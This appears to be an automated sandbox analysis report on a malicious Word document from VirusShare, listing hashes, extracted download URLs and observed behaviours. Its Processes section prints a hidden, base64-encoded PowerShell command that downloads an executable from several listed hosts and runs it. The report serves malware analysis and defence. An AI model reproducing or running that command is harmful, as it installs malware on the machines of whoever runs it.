Analysis
-
max time kernel
105s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
16/04/2025, 07:28
Static task
static1
Behavioral task
behavioral1
Sample
virusshare/1/VirusShare_0fea640a7da27f365b3675f73626b9c9.xls
Resource
win10v2004-20250410-en
Behavioral task
behavioral2
Sample
virusshare/1/VirusShare_0fea640a7da27f365b3675f73626b9c9.xls
Resource
win11-20250410-en
Behavioral task
behavioral3
Sample
virusshare/1/VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc
Resource
win10v2004-20250314-en
Behavioral task
behavioral4
Sample
virusshare/1/VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc
Resource
win11-20250410-en
Behavioral task
behavioral5
Sample
virusshare/1/VirusShare_3cd9a967b67fe69351e390195ca7a430.pdf
Resource
win10v2004-20250410-en
Behavioral task
behavioral6
Sample
virusshare/1/VirusShare_3cd9a967b67fe69351e390195ca7a430.pdf
Resource
win11-20250410-en
General
-
Target
virusshare/1/VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc
-
Size
182KB
-
MD5
1ba8249d8503c0cf7bc125588c43bef9
-
SHA1
eb473c845c7474010ff35a3e8a169a9b6b9e5ebe
-
SHA256
a44031feb2a71980a0980377c8f7b6f3b5b9dfa0f708556dd420be323c7e1a38
-
SHA512
b5421ca474e8ccd30683b90a83e98c6ba74c8418201aaa923ba6c7805ef724b37dfabb74cfedccbb69e3fcf923635f64faa406f280057404f78957df3d840c8c
-
SSDEEP
3072:9NO2y/GdywFyktGDWLS0HZWD5w8K7Nk9rD7IBU9asiv8Oc7V:9NO2k4PF7tGiL3HJk9rD7b9asiv8dZ
Malware Config
Extracted
http://diwafashions.com/wp-admin/mqau6/
http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/
http://dixartcontractors.com/cgi-bin/nnuv/
http://diaspotv.info/wordpress/G/
http://easyvisaoverseas.com/cgi-bin/v/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 944 2628 Powershell.exe 87 -
Blocklisted process makes network request 2 IoCs
flow pid Process 27 944 Powershell.exe 28 944 Powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 944 Powershell.exe -
Deletes itself 1 IoCs
pid Process 5424 WINWORD.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\virusshare\1\~WRD0000.tmp\:Zone.Identifier:$DATA WINWORD.EXE File created C:\Users\Admin\AppData\Local\Temp\virusshare\1\~WRD0002.tmp\:Zone.Identifier:$DATA WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 5424 WINWORD.EXE 5424 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 944 Powershell.exe 944 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 944 Powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 5424 WINWORD.EXE 5424 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE 5424 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 5424 wrote to memory of 5024 5424 WINWORD.EXE 90 PID 5424 wrote to memory of 5024 5424 WINWORD.EXE 90
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\virusshare\1\VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc" /o ""1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5424 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:5024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABWAGgAZAByAGkAZwBwAHQAeQA9ACcARwByAG4AcgBsAHYAagBnAHEAdwBpAGUAbAAnADsAJABRAGgAeQBtAGQAZAB0AHAAdQAgAD0AIAAnADgAOAAyACcAOwAkAFEAeQBmAHIAZgBhAHgAcABzAHAAeQA9ACcAQgBuAGIAbwByAGEAZwB6AGwAcgAnADsAJABLAGEAdABxAGgAcwByAGcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFEAaAB5AG0AZABkAHQAcAB1ACsAJwAuAGUAeABlACcAOwAkAE8AYQBqAG4AZAByAHUAbAByAD0AJwBTAHoAdABnAHUAeAB6AHcAdwBrAHUAbwAnADsAJABGAHUAegBqAGQAcwBnAHYAZQA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAYgBDAGwAaQBFAE4AVAA7ACQAVgB4AHkAegB5AHYAeQBzAGYAbQA9ACcAaAB0AHQAcAA6AC8ALwBkAGkAdwBhAGYAYQBzAGgAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBxAGEAdQA2AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGkAZwBuAGUAcgBzAC4AaABvAHQAYwBvAG0ALQB3AGUAYgAuAGMAbwBtAC8AdQBiAGsAcwBrAHcAMgA5AGMAbABlAGsALwBxAG4AcABtADEAcAAvACoAaAB0AHQAcAA6AC8ALwBkAGkAeABhAHIAdABjAG8AbgB0AHIAYQBjAHQAbwByAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBuAG4AdQB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBhAHMAcABvAHQAdgAuAGkAbgBmAG8ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAEcALwAqAGgAdAB0AHAAOgAvAC8AZQBhAHMAeQB2AGkAcwBhAG8AdgBlAHIAcwBlAGEAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHYALwAnAC4AIgBzAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAUAB1AHcAcQBvAGYAZwBoAGwAPQAnAE4AYgBwAHgAZABuAHUAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAgAGkAbgAgACQAVgB4AHkAegB5AHYAeQBzAGYAbQApAHsAdAByAHkAewAkAEYAdQB6AGoAZABzAGcAdgBlAC4AIgBkAG8AdwBOAEwAbwBhAGQAYABGAGAASQBsAGUAIgAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAsACAAJABLAGEAdABxAGgAcwByAGcAKQA7ACQAUAB5AHUAbQBiAG0AdgBiAHYAdAA9ACcASABuAHgAeQB2AGMAcwBuACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASwBhAHQAcQBoAHMAcgBnACkALgAiAGwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA4ADQAMQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABhAGAAUgBUACIAKAAkAEsAYQB0AHEAaABzAHIAZwApADsAJABHAGcAdwBqAHkAcwB4AHoAPQAnAFgAYQB2AGMAZABtAHMAbABnAHAAeAAnADsAYgByAGUAYQBrADsAJABVAGIAYQBmAHIAcwBrAGYAeQBiAD0AJwBHAGYAYwB4AGkAeQB1AGEAbQBqAG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAGEAYwBlAHgAZQByAHUAYgBpAHgAbgA9ACcAQQBrAHoAeQB5AG8AeABoAHAAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:944
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
444B
MD5bf6c0e03017c4c671d600f1538f06f93
SHA1c5b31faac8bf742535756233f3d4e338673291ab
SHA2562eae80bfdbb9b62b8ce86e613cd177ea75c2e4e71fe25bc8f27b94a7e4d31dd2
SHA5126b7505b21d0b36fef27d38c1f6f733eb49b0558421e0f4a3446cfb70fcaa36975cb52339e359a816db6c784d4bafd518769ab9a62001be5f84ef36157036a981
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
213KB
MD503ac40607c102bb20b4e11bb8cb2b7af
SHA13881c90eeadd1c70d18c9601d1b0181de05a718d
SHA2568f9fec46f92f1171b90481748e73821fabd6b791e716a70b514e908658f930ba
SHA51248112121d9b3bb656989bf300d33f2978d9540925dc5aa75e7b1ec5623f45fa2d2c8250e8008ea3ca3bea0ab243760bed899fceb64c1853a70fe9d30a0575abd
-
Filesize
213KB
MD5db5988dc68c133f9977e91227bc3eeec
SHA1353faa6cf3c70c2da8961096995ce692cb5388bd
SHA256e560f2658a331eae1a14f671f0eb357cee2b8b7478a98cfaed3bd52739b685eb
SHA5123f15545156909a770daa13f6a682072271ed78aac61258808ce77a528fd8ce8e68fbfaddc94ad1f5dcc522e7ef1f3deea483f8908bc387745cdd2df490797d0a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize2KB
MD55c3c9de7fac06d022b9e965f786d3dbc
SHA11485551a743b1d3918514b4f90679def1c5b8fe6
SHA256baf7805ea06bbbae424cfd61474a794e285abceeeeafe79f0812eef8a1246fc3
SHA512c9763822b27bf987295c256216c44842ab6751c6c21734d01a8cdeb923d3d8ed9ac8c173ec4a0fc36a91a54433b51a01f71811a33a9c0483ee9e99169fe72f6f